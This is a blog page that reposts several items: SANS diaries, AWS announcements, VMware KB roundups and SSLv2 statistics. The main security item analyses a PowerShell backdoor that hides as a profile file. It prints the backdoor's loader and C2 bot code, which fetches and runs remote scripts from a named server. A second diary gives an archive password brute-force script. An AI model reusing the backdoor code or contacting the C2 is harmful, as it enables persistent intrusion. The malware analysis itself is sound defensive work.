All posts by David

Undetected PowerShell Backdoor Disguised as a Profile File, (Fri, Jun 9th)

This post was originally published on this site

PowerShell remains an excellent way to compromise computers. Many PowerShell scripts found in the wild are usually obfuscated. Most of the time, this helps to have the script detected by fewer antivirus vendors. Yesterday, I found a script that scored 0/59 on VT! Let’s have a look at it.

The file was found with the name « Microsoft.PowerShell_profile.ps1 ». The attacker nicely selected this name because this is a familiar name used by Microsoft to manage PowerShell profiles[1]. You may compare this to the « .bashrc » on Linux. It’s a way to customize your environment. Everything you launch a PowerShell, it will look for several locations, and if a file is found, it will execute it. Note that it’s also an excellent way to implement persistence because the malicious code will be re-executed every time a new PowerShell is launched. It’s listed as T1546.013[2] in the MITRE framework.

Let’s reverse the script (SHA256: a3d265a0ab00466aab978d0ccf94bb48808861b528603bddead6649eea7c0d16). When opened in a text editor, we can see that it is heavily obfuscated:

$mkey = "hxlksmxfcmspgnhf";
$srv = "AAwYG0lCV1daXV1BU0BbUUZKWF5JVUhWUw==";
$cmp = "CggGEgkeExAGCRwKCQ0aEQ==";

$bSDvRdgFlcnAwxj = @(24,'r','','IHwgb3V0LW51bGwKJHBzLkFkZEFyZ3V','',21,'d',([int](("94UmlEWn459UmlEWn686UmlEWn786UmlEWn10UmlEWn22UmlEWn633UmlEWn666UmlEWn701UmlEWn553" -split "UmlEWn")[5])),([int](("650Wmugo21Wmugo835Wmugo417Wmugo906Wmugo812Wmugo286Wmugo749Wmugo960Wmugo29" -split "Wmugo")[9])),([int](("419Gm370Gm388Gm238Gm2Gm902Gm197Gm582Gm305Gm133" -split "Gm")[4])),([string](("pTOikLyVWRMBZLkLyqgzIlWkLyLQOKkLyDjwiHkLyDQtofyikLyoKkLynbKDLukLyYBtQkLyTFkmtvQbI" -split "kLy")[6])),([string](("ulxwNSBGgYFDhZCbGgYFDhZLMQxkZGgYFDhZoafQGZyGgYFDhZwjysVfDOGgYFDhZcWPBAJfZRGgYFDhZHpzWCeiGgYFDhZSxpjbwIsGgYFDhZCFsGgYFDhZg" -split "GgYFDhZ")[([int](("9kdIhpwlnjWt689kdIhpwlnjWt878kdIhpwlnjWt775kdIhpwlnjWt965kdIhpwlnjWt828kdIhpwlnjWt529kdIhpwlnjWt957kdIhpwlnjWt917kdIhpwlnjWt224" -split "kdIhpwlnjWt")[0]))])),46,'tV','Ut',33,'VudFN0YXRlID0gIlNUQSIKJHJz',([int](("41rVCGBZ17rVCGBZ230rVCGBZ879rVCGBZ163rVCGBZ152rVCGBZ7rVCGBZ190rVCGBZ91rVCGBZ800" -split "rVCGBZ")[0])),27,([string](("vRUuwlkhDgkhjBTkhCYbTUGxkhskkhrefJkhmPESOhykhoWkhn.AmsikhmQkLRonvi" -split "kh")

Note the presence of the three variables at the top of the file.

The obfuscation technique is pretty good: Arrays of interesting strings are created but split using random strings. The last line of the script is very long passed to an Invoke-Expression. To speed up the analysis, you can replace the IEX with a simple echo to print the deobfuscated code:

[Scriptblock]$script = {
    param($mkey, $srv, $cmp)
    function ConvertFrom-JSON20([object] $item){
        ...
        return ,$ps_js.DeserializeObject($item);
    }

    function xor($data, $key){
        ...
        return $xordData
    }

    function Main{
        $enc = [System.Text.Encoding]::UTF8
        $srv = [System.Convert]::FromBase64String($srv)
        $srv = xor $srv $mkey
        $srv = $enc.getString($srv)
        $cmp = [System.Convert]::FromBase64String($cmp)
        $cmp = xor $cmp $mkey
        $cmp = $enc.getString($cmp)
        $enc = [System.Text.Encoding]::UTF8
        $UUID = (get-wmiobject Win32_ComputerSystemProduct).uuid;
        $xorkey = $enc.GetBytes($cmp)
        $data = xor $enc.GetBytes($UUID) $xorkey;
        $web = New-Object System.Net.WebClient;
        while($true){
            try{
                $res = $web.UploadData("$srv/$cmp", $data);break
            }catch{
                if($_.exception -match '(404)'){exit}
            }
            Start-Sleep -s 60;
        }
        $res = xor $res $cmp
        $res = $enc.GetString($res);
        $res = ConvertFrom-JSON20($res);
        $script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($res.script));
        $script = [Scriptblock]::Create($script);
        Invoke-Command -ScriptBlock $script -ArgumentList $res.args;
     }
     Main
}

$rs = [runspacefactory]::CreateRunspace()
$rs.ApartmentState = "STA"
$rs.ThreadOptions = "ReuseThread"          
$rs.Open()
$rs.SessionStateProxy.SetVariable("h",$host)
$ps = [PowerShell]::Create()
$ps.Runspace = $rs
$ps.AddScript($script) | out-null
$ps.AddArgument($mkey) | out-null
$ps.AddArgument($srv) | out-null
$ps.AddArgument($cmp) | out-null
$res = $ps.BeginInvoke()

The script creates a script-block and executes a runspace[3]. The script will try to contact a C2 server and submit the system UUID, probably to create the "bot" on the C2 side. The C2 address is generated via the three passed parameters (on top of the script):

The C2 will return JSON data that will contain interesting data:

{
    "script": "...", 
    "args": [
        "http://190.14.37.245:8000", 
        "bpjyzskvedozncrw",
        "<RSAKeyValue>...</RSAKeyValue>",
        "<RSAKeyValue>...</RSAKeyValue>", 
        15
        ]
}

A second script is returned (Base64 encoded) with the same C2 address (I presume it could be another one and some encryption-related material. What's the purpose of "bpjyzskvedozncrw"? It's the campaign ID has it is described in the next-stage script:

param(
    [string]$server_url, 
    [string]$campaign_id, 
    [string]$RSAPanelPubKey, 
    [string]$RSABotPrivateKey, 
    [int]$polling_interval
)

function ConvertTo-JSON20 {
    ...
}

function ConvertFrom-JSON20([object] $item){
    ...
}

function Is-VM {
    ...
}

function Encrypt-Data{
    ...
}

function Decrypt-Data{
    ...
}

function Get-SystemInfo {
    ...
}

function Start-RunspaceDisposer($jobs){
    ...
}

function Add-Log{
    ...
}

function Run-Module{
    ...
}

function main{
    $UUID = (get-wmiobject Win32_ComputerSystemProduct).uuid;
    $mtx = New-Object System.Threading.Mutex($false, $uuid);
    $mtx.WaitOne()
    $jobs = [system.collections.arraylist]::Synchronized((New-Object System.Collections.ArrayList))
    Start-RunspaceDisposer $jobs
    $runningtasks = [hashtable]::Synchronized(@{})
    $logs = [system.collections.arraylist]::Synchronized((New-Object System.Collections.ArrayList))
    while($true){
        try{
            $web = New-Object Net.WebClient;
            $random_path = -join ((97..122) | Get-Random -Count 24 | % {[char]$_});
            $data = @{UUID = $UUID; campaign_id = $campaign_id};
            $data = $data | ConvertTo-JSON20;
            $data = Encrypt-Data -data $data;
            $res = $web.UploadData("$server_url/$random_path", $data);
            if(!$res){
                $systeminfo = Get-SystemInfo;
                $data = @{UUID = $UUID; systeminfo = $systeminfo; campaign_id = $campaign_id};
                $data = $data | ConvertTo-JSON20;
                $data = Encrypt-Data -data $data;
                $web.UploadData("$server_url/$random_path", $data);
                Start-Sleep -s 3;
                continue;
            }
            $res = Decrypt-Data -data $res;
            $res = [System.Text.Encoding]::UTF8.GetString($res).Trim([char]0);
            $res = ConvertFrom-JSON20($res);
            $url_id = $res.url_id;
            while($true){
                $url = "$server_url/$url_id";
                $task = $web.DownloadData($url);
                $task = Decrypt-Data -data $task;
                $task = [System.Text.Encoding]::UTF8.GetString($task).Trim([char]0);
                $task = ConvertFrom-JSON20($task);

                if($task.task_id -and $task.scriptname){
                    $task_id = $task.task_id
                    $scriptname = $task.scriptname
                    try{
                        if(!($task.scriptname -eq 'hbr' -and $task.type -eq 'run')){
                            $task_report = @{UUID = $UUID; task_id = $task_id; status = 'running'};
                            $task_report = $task_report | ConvertTo-JSON20;
                            $task_report = Encrypt-Data -data $task_report;
                            $random_path = -join ((97..122) | Get-Random -Count 24 | % {[char]$_});    
                            $web.UploadData("$server_url/$random_path", $task_report);
                        }
                    }catch{
                        #write-host $_.exception
                    }
                
                    if($task.type -eq 'run'){
                        $script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($task.script));
                        $scriptblock = [Scriptblock]::Create($script);
                        if($task.background){
                            $runningtasks.$scriptname = @{'exit'=$false}
                            Run-Module $scriptblock $task.args $jobs $runningtasks $logs $task_id $scriptname
                        }

                        else{
                            Run-Module $scriptblock $task.args $jobs $null $logs $task_id $scriptname
                            if($scriptname -eq 'remove'){start-sleep -s 30; exit}
                        }
                    }
                    elseif($task.type -eq 'kill'){
                        if($runningtasks.ContainsKey($scriptname)){
                            $runningtasks.$scriptname.exit = $true
                            $runningtasks.remove($scriptname)    
                        }

                        try{
                            $task_report = @{UUID = $UUID; task_id = $task_id; status = 'completed'};
                            $task_report = $task_report | ConvertTo-JSON20;
                            $task_report = Encrypt-Data -data $task_report;
                            $random_path = -join ((97..122) | Get-Random -Count 24 | % {[char]$_});    
                            $web.UploadData("$server_url/$random_path", $task_report);
                        }catch{
                            #write-host $_.exception
                        }
                    }
                }

                $logsToProcess = @()
                while($logs.count -gt 0){
                    $logsToProcess += $logs[0]
                    $logs.RemoveAt(0)
                }

                if($task.debug -and $logsToProcess.Count -gt 0){
                    try{
                        $data = @{'logs'=$logsToProcess; 'uuid'=$UUID}
                        $data = $data | ConvertTo-JSON20
                        $data = Encrypt-Data -data $data;
                        $random_path = -join ((97..122) | Get-Random -Count 24 | % {[char]$_});
                        $web.UploadData("$server_url/$random_path", $data) | Out-Null;
                    }catch{
                        #write-host $_.exception
                    }
                }

                $url_id = $task.url_id;
                
                [System.GC]::Collect();
                Start-Sleep -s $task.polling_interval;
            }
        }
        catch{
            [System.GC]::Collect();
            Start-Sleep -s $polling_interval;
        }
        
    }
    $mtx.ReleaseMutex();
    $mtx.Dispose();
}

main

The script uses the same technique and runs its code inside another runspace. It enters an infinite loop, waiting for some commands from the C2 server:

While writing this diary, the C2 server (%%ip:190.14.37.254%%) is still alive. I started a honeypot to capture all details from a potential attempt to use my system. I'm now waiting for some activity…

[1] https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.3
[2] https://attack.mitre.org/techniques/T1546/013/
[3] https://devblogs.microsoft.com/scripting/beginning-use-of-powershell-runspaces-part-1/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

AWS Week in Review – Amazon Security Lake Now GA, New Actions on AWS Fault Injection Simulator, and More – June 5, 2023

This post was originally published on this site

Last Wednesday, I traveled to Cape Town to speak at the .Net Developer User Group. My colleague Francois Bouteruche also gave a talk but joined virtually. I enjoyed my time there—what an amazing community! Join the group in order to learn about upcoming events.

Now onto the AWS updates from last week. There was a lot of news related to AWS, and I have compiled a few announcements you need to know. Let’s get started!

Last Week’s Launches
Here are a few launches from last week that you might have missed:

Amazon Security Lake is now Generally Available – This service automatically centralizes security data from AWS environments, SaaS providers, on-premises environments, and cloud sources into a purpose-built data lake stored in your account, making it easier to analyze security data, gain a more comprehensive understanding of security across your entire organization, and improve the protection of your workloads, applications, and data. Read more in Channy’s post announcing the preview of Security Lake.

New AWS Direct Connect Location in Santiago, Chile – The AWS Direct Connect service lets you create a dedicated network connection to AWS. With this service, you can build hybrid networks by linking your AWS and on-premises networks to build applications that span environments without compromising performance. Last week we announced the opening of a new AWS Direct Connect location in Santiago, Chile. This new Santiago location offers dedicated 1 Gbps and 10 Gbps connections, with MACsec encryption available for 10 Gbps. For more information on over 115 Direct Connect locations worldwide, visit the locations section of the Direct Connect product detail pages.

New actions on AWS Fault Injection Simulator for Amazon EKS and Amazon ECS – Had it not been for Adrian Hornsby’s LinkedIn post I would have missed this announcement. We announced the expanded support of AWS Fault Injection Simulator (FIS) for Amazon Elastic Kubernetes Service (EKS) and Amazon Elastic Container Service (ECS). This expanded support adds additional AWS FIS actions for Amazon EKS and Amazon ECS. Learn more about Amazon ECS task actions here, and Amazon EKS pod actions here.

Other AWS News
A few more news items and blog posts you might have missed:

Autodesk Uses Sagemaker to Improve Observability – One of our customers, Autodesk, used AWS services including Amazon Sagemaker, Amazon Kinesis, and Amazon API Gateway to build a platform that enables development and deployment of near-real time personalization experiments by modeling and responding to user behavior data. All this delivered a dynamic, personalized experience for Autodesk’s customers. Read more about the story at AWS Customer Stories.

AWS DMS Serverless – We announced AWS DMS Serverless which lets you automatically provision and scale capacity for migration and data replication. Donnie wrote about this announcement here.

For AWS open-source news and updates, check out the latest newsletter curated by my colleague Ricardo Sueiras to bring you the most recent updates on open-source projects, posts, events, and more.

For a full list of AWS announcements, be sure to keep an eye on the What’s New at AWS page.

Upcoming AWS Events
We have the following upcoming events. These give you the opportunity to meet with other tech enthusiasts and learn:

AWS Silicon Innovation Day (June 21) – A one-day virtual event that will allow you to understand AWS Silicon and how you can use AWS’s unique silicon offerings to innovate. Learn more and register here.

AWS Global Summits – Sign up for the AWS Summit closest to where you live: London (June 7), Washington, DC (June 7–8), Toronto (June 14).

AWS Community Days – Join these community-led conferences where event logistics and content are planned, sourced, and delivered by community leaders: Chicago, Illinois (June 15), and Chile (July 1).

And with that, I end my very first Week in Review post, and this was such fun to write. Come back next Monday for another Week in Review!

Veliswa x

This post is part of our Week in Review series. Check back each week for a quick roundup of interesting news and announcements from AWS!

Brute Forcing Simple Archive Passwords, (Mon, Jun 5th)

This post was originally published on this site

[Guest dairy submitted by Gebhard]

Occasionally, malicious files are distributed by email in a password-protected attachment to restrain email security gateways from analyzing the included files. The password can normally be found in the email itself and is pretty simple: it should only hinder analysis and not the lazy (but curious) user from opening the attachment.

But what if the email containing the password is lost? For example, the encrypted file attachment could have been saved some time ago to disk (not detected as being malicious at that time) but be detected afterward, e.g., by a full scan or IoCs. So now you have an encrypted archive file, and you're pretty damn sure it's malicious (e.g., VT tells you so – but doesn't provide any details).

Because the bad guys don't want to overburden the user, the password is short (3-4 characters) and only contains characters and numbers. So this is a rare case where it can make sense to just brute-force the password of the archive in a reasonable time. 

I've looked around but haven't found any tool which can be used out of the box. So I used some ideas ([1], [2]) and created a script that should run on Kali 2023 out of the box:

#!/bin/bash

VERSION="v0.2"

# based on: 

# - https://synacl.wordpress.com/2012/08/18/decrypting-a-zip-using-john-the-ripper/
# - https://gist.github.com/bcoles/421cc413d07cd9ba7855
# modified for bruteforcing 

# use for malicious file attachments with short passwords
# tested on kali 2023
# 2023-05-27 v0.1 gebhard
# 2023-05-28 v0.2 gebhard
# Todos:
# - make password method configurable
# - speed up / distribute brute forcing

LINE="#############################################################################"

echo "Archive Password Bruteforce Script ${VERSION}"
echo "---------------------------------------"

# check parameters
if [ $# -lt 1 ]; then
   echo "Usage $0 <archive-file> [<min-length:3> <max-length:6>]"
   exit 1
fi

ZIP=${1}

# crunch configuration
# default values for password length: min=3, max=6
MINLENGTH=${2-3}
MAXLENGTH=${3-6}
# crunch charset config
CHARFILE="/usr/share/crunch/charset.lst"
CHARSET="mixalpha-numeric"

if [ ! -r ${ZIP} ] ; then
   echo "Archive file "${ZIP}" not found."
   exit 2
fi
if [ ! -r ${CHARFILE} ] ; then
   echo "Charset file "${CHARFILE}" not found."
   exit 2
fi

echo "Parameters"
echo "----------"
echo "File      : ${ZIP}"
echo "Min-Length: ${MINLENGTH}"
echo "Max-Length: ${MAXLENGTH}"
echo "Charfile  : ${CHARFILE}"
echo "Charset   : ${CHARSET}"
echo ${LINE}

# counter for sign of life
COUNT=0
# every xxx guesses: display sign of life
SOL=1000
# counter for total guesses
GUESS=0

echo "Archive content"
echo "---------------"
7z l ${ZIP}

# check if 7z found the file to be OK
if [ ${?} -ne 0 ] ; then
   echo ${LINE}
   echo "7z reported an error. Archive file corrupt?"
   exit 3
fi

echo ${LINE}
echo "Continue: ENTER, Abort: <CTRL+C>"
read lala

echo ${LINE}

echo "Start: `date`"

# note: stdout of crunch is passed to a subshell, so passing variables back is not that easy
crunch ${MINLENGTH} ${MAXLENGTH} -f ${CHARFILE} ${CHARSET} |
   while IFS= read -r PASS
   do
      # count total guesses
      ((GUESS=GUESS+1))
      # every $SOL passwords: display a sign of life
      ((COUNT=COUNT+1))
      if [ ${COUNT} -eq ${SOL} -o ${COUNT} -eq 0 ] ; then
         COUNT=0
         echo -ne "rCurrent password (guess: ${GUESS}): "${PASS}" "
      fi
      # try to extract
      7z t -p${PASS} ${ZIP} >/dev/null 2>&1 

      # check exit code of 7z
      if [ ${?} -eq 0 ]; then
         # 7z returns 0, so password has been found 

         echo ""
         echo ${LINE}
         echo "Script finished (${GUESS} guesses)."
         echo "Archive password is: "${PASS}""
         echo "End: `date`"
         # return from subshell with exit status 99 so that main process knows pwd has been found
         exit 99
      fi
   done

# if exit code from subshell is not 99 then pwd has not been found
if [ ${?} -ne 99 ] ; then
   echo ""
   echo ${LINE}
   echo "Script finished. No password found."
   echo "End: `date`"
   exit -1
fi

exit 0

I used a slightly earlier version of the script, and it was able to get the password for this example
https://www.virustotal.com/gui/file/dc374b6eeae0a555796f2a6811997fda6e1a6b293a2c63e1c7254ac61c990c5b
in about 12 hours on a reasonably fast VM using 12,131,410 attempts. 

Here's the output:
???(kali?kali)-[~/analysis/]
??$ ./pw-brute.sh file.zip 

ZIP Password Bruteforce Script
------------------------------
Parameters
----------
File: file.zip
Min-Length: 3
Max-Length: 6
Charfile:   /usr/share/crunch/charset.lst
Charset:    mixalpha-numeric
#############################################################################
Archive content
---------------

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,128 CPUs Intel(R) Xeon(R) E-2104G CPU @ 3.20GHz (906EA),ASM,AES-NI)

Scanning the drive for archives:
1 file, 648326 bytes (634 KiB)

Listing archive: file.zip

--
Path = file.zip
Type = zip
Physical Size = 648326

   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2022-10-10 08:27:19 ....A      1525760       648148  New_documents#3893.iso
------------------- ----- ------------ ------------  ------------------------
2022-10-10 08:27:19            1525760       648148  1 files
#############################################################################
Continue: ENTER, Abort: <CTRL+C>

#############################################################################
Start: Sat May 27 04:02:00 PM EDT 2023
Crunch will now generate the following amount of data: 403173281072 bytes
384496 MB
375 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 57731383080 

Current password (guess: 12131000): "X3Zr" 

##########################################################################
Script finished (12131410 guesses).
Archive password is: "X353"
End: Sun May 28 04:37:39 AM EDT 2023

The script is pretty basic:
– get the archive file name and, optionally the min and max password length from the user
– do a basic check on the archive (make sure 7z can access the content)
– use "crunch" to loop through a list of mix alpha-numeric passwords which fit between the length borders
– for every password: try to extract the archive (without actually writing the files to disk)
– if found: exit the loop

Handling the password-found vs. password-not-found case has to work despite the actual check running in a subshell. So we're using an exit code to signal the main process if the password was found (99) or not.

If this was helpful, feel free to issue a comment with details. 


This guest diary was submitted by Gebhard.


 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Top 10 Most Popular Knowledge Articles for Horizon, WorkspaceONE, End User Computing (EUC), Personal Desktop for May, 2023   

This post was originally published on this site

Tweet Get answers and solutions instantly by using VMware’s Knowledge Base (KB) articles to solve known issues. Whether you’re looking to improve your productivity, troubleshoot common issues, or simply learn something new, these most used and most viewed knowledge articles are a great place to start.   Here are the top 5 most viewed KB articles … Continued

The post Top 10 Most Popular Knowledge Articles for Horizon, WorkspaceONE, End User Computing (EUC), Personal Desktop for May<strong>, </strong>2023    appeared first on VMware Support Insider.

New – AWS DMS Serverless: Automatically Provisions and Scales Capacity for Migration and Data Replication

This post was originally published on this site

With the vast amount of data being created today, organizations are moving to the cloud to take advantage of the security, reliability, and performance of fully managed database services. To facilitate database and analytics migrations, you can use AWS Database Migration Service (AWS DMS). First launched in 2016, AWS DMS offers a simple migration process that automates database migration projects, saving time, resources, and money.

Although you can start AWS DMS migration with a few clicks through the console, you still need to do research and planning to determine the required capacity before migrating. It can be challenging to know how to properly scale capacity ahead of time, especially when simultaneously migrating many workloads or continuously replicating data. On top of that, you also need to continually monitor usage and manually scale capacity to ensure optimal performance.

Introducing AWS DMS Serverless
Today, I’m excited to tell you about AWS DMS Serverless, a new serverless option in AWS DMS that automatically sets up, scales, and manages migration resources to make your database migrations easier and more cost-effective.

Here’s a quick preview on how AWS DMS Serverless works:

AWS DMS Serverless removes the guesswork of figuring out required compute resources and handling the operational burden needed to ensure a high-performance, uninterrupted migration. It performs automatic capacity provisioning, scaling, and capacity optimization of migrations, allowing you to quickly begin migrations with minimal oversight.

At launch, AWS DMS Serverless supports Microsoft SQL Server, PostgreSQL, MySQL, and Oracle as data sources. As for data targets, AWS DMS Serverless supports a wide range of databases and analytics services, from Amazon Aurora, Amazon Relational Database Service (Amazon RDS), Amazon Simple Storage Service (Amazon S3), Amazon Redshift, Amazon DynamoDB, and more. AWS DMS Serverless continues to add support for new data sources and targets. Visit Supported Engine Versions to stay updated.

With a variety of sources and targets supported by AWS DMS Serverless, many scenarios become possible. You can use AWS DMS Serverless to migrate databases and help to build modern data strategies by synchronizing ongoing data replications into data lakes (e.g., Amazon S3) or data warehouses (e.g., Amazon Redshift) from multiple, perhaps disparate data sources.

How AWS DMS Serverless Works
Let me show you how you can get started with AWS DMS Serverless. In this post, I migrate my data from a source database running on PostgreSQL to a target MySQL database running on Amazon RDS. The following screenshot shows my source database with dummy data:

As for the target, I’ve set up a MySQL database running in Amazon RDS. The following screenshot shows my target database:

Getting starting with AWS DMS Serverless is similar to how AWS DMS works today. AWS DMS Serverless requires me to complete the setup tasks such as creating a virtual private cloud (VPC) to defining source and target endpoints. If this is your first time working with AWS DMS, you can learn more by visiting Prerequisites for AWS Database Migration Service.

To connect to a data store, AWS DMS needs endpoints for both source and target data stores. An endpoint provides all necessary information including connection, data store type, and location to my data stores. The following image shows an endpoint I’ve created for my target database:

When I have finished setting up the endpoints, I can begin to create a replication by selecting the Create replication button on the Serverless replications page. Replication is a new concept introduced in AWS DMS Serverless to abstract instances and tasks that we normally have in standard AWS DMS. Additionally, the capacity resources are managed independently for each replication.

On the Create replication page, I need to define some configurations. This starts with defining Name, then specifying Source database endpoint and Target database endpoint. If you don’t find your endpoints, make sure you’re selecting database engines supported by AWS DMS Serverless.

After that, I need to specify the Replication type. There are three types of replication available in AWS DMS Serverless:

  • Full load — If I need to migrate all existing data in source database
  • Change data capture (CDC) — If I have to replicate data changes from source to target database.
  • Full load and change data capture (CDC) — If I need to migrate existing data and replicate data changes from source to target database.

In this example, I chose Full load and change data capture (CDC) because I need to migrate existing data and continuously update the target database for ongoing changes on the source database.

In the Settings section, I can also enable logging with Amazon CloudWatch, which makes it easier for me to monitor replication progress over time.

As with standard AWS DMS, in AWS DMS Serverless, I can also configure Selection rules in Table mappings to define filters that I need to replicate from table columns in the source data store.

I can also use Transformation rules if I need to rename a schema or table or add a prefix or suffix to a schema or table.

In the Capacity section, I can set the range for required capacity to perform replication by defining the minimum and maximum DCU (DMS capacity units). The minimum DCU setting is optional because AWS DMS Serverless determines the minimum DCU based on an assessment of the replication workload. During replication process, AWS DMS uses this range to scale up and down based on CPU utilization, connections, and available memory.

Setting the maximum capacity allows you to manage costs by making sure that AWS DMS Serverless never consumes more resources than you have budgeted for. When you define the maximum DCU, make sure that you choose a reasonable capacity so that AWS DMS Serverless can handle large bursts of data transaction volumes. If traffic volume decreases, AWS DMS Serverless scales capacity down again, and you only pay for what you need. For cases in which you want to change the minimum and maximum DCU settings, you have to stop the replication process first, make the changes, and run the replication again.

When I’m finished with configuring replication, I select Create replication.

When my replication is created, I can view more details of my replication and start the process by selecting Start.

After my replication runs for around 40 minutes, I can monitor replication progress in the Monitoring tab. AWS DMS Serverless also has a CloudWatch metric called Capacity utilization, which indicates the use of capacity to run replication according to the range defined as minimum and maximum DCU. The following screenshot shows the capacity scales up in the CloudWatch metrics chart.

When the replication finishes its process, I see the capacity starting to decrease. This indicates that in addition to AWS DMS Serverless successfully scaling up to the required capacity, it can also scale down within the range I have defined.

Finally, all I need to do is verify whether my data has been successfully replicated into the target data store. I need to connect to the target, run a select query, and check if all data has been successfully replicated from the source.

Now Available
AWS DMS Serverless is now available in all commercial regions where standard AWS DMS is available, and you can start using it today. For more information about benefits, use cases, how to get started, and pricing details, refer to AWS DMS Serverless.

Happy migrating!
Donnie

Top 10 Most Popular Knowledge Articles for HCX, SaaS, EPG Emerging Products Group for May, 2023   

This post was originally published on this site

Tweet Get answers and solutions instantly by using VMware’s Knowledge Base (KB) articles to solve known issues. Whether you’re looking to improve your productivity, troubleshoot common issues, or simply learn something new, these most used and most viewed knowledge articles are a great place to start.   Here are the top 5 most viewed KB articles … Continued

The post Top 10 Most Popular Knowledge Articles for HCX, SaaS, EPG Emerging Products Group for May<strong>, </strong>2023    appeared first on VMware Support Insider.

After 28 years, SSLv2 is still not gone from the internet… but we're getting there, (Thu, Jun 1st)

This post was originally published on this site

Although the SSL/TLS suite of protocols has been instrumental in making secure communication over computer networks into the (relatively) straightforward affair it is today, the beginnings of these protocols were far from ideal.

The first publicly released version of Secure Sockets Layer protocol, the SSL version 2.0, was published all the way back in 1995 and was quickly discovered to contain a number of security flaws. This has led to the development of a more secure version of the protocol named SSLv3, which was officially published only a year later (and which, as it later turned out, had its own set of issues). It has also led to the official deprecation of SSLv2 in 2011[1].

Although due to its deprecated status, most web browsers out there have been unable to use SSLv2 for over a decade, the support for this protocol still lingers. Few years ago, one might still have found it supported even on web servers, which one would hope would be as secure as possible – for example, on servers providing access to internet banking services[2].

Nevertheless, while going over data about open ports and protocol support on the internet, which I have gathered over time from Shodan using my TriOp tool, I have recently noticed that although there is still a not insignificant number of web servers which support SSLv2, the overall trend seems to show that such systems are slowly “dying off”.

While according to Shodan, two years back, over 1.43% of all web servers supported SSLv2, currently, it is only about 0.35%.

This data seems to be supported by the latest statistics from Qualys SSL Labs[3], which show that the service has only detected SSLv2 being supported on 0.2% of all servers it scanned in the course of April 2023.

Since common web browsers can’t even use SSLv2 these days, its continued support may not be too problematic of an issue on its own. Nevertheless, the fact that a certain web server supports this anachronistic protocol provides an interesting indicator that other vulnerabilities and security issues may (and most likely will) be present on the same system.

So, although, just like in case of the Conficker worm[4], it is unlikely that we will ever get completely rid of SSLv2, it is good to see that the number and percentage of web servers which support it is decreasing at a fairly reasonable rate. Hopefully, it will continue to fall the same way in the future…

[1] https://en.wikipedia.org/wiki/Transport_Layer_Security#History_and_development
[2] https://isc.sans.edu/forums/diary/Internet+banking+sites+and+their+use+of+TLS+and+SSLv3+and+SSLv2/25606/
[3] https://www.ssllabs.com/ssl-pulse/
[4] https://ics-cert.kaspersky.com/publications/reports/2022/09/08/threat-landscape-for-industrial-automation-systems-statistics-for-h1-2022/

———–
Jan Kopriva
@jk0pr
Nettles Consulting

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.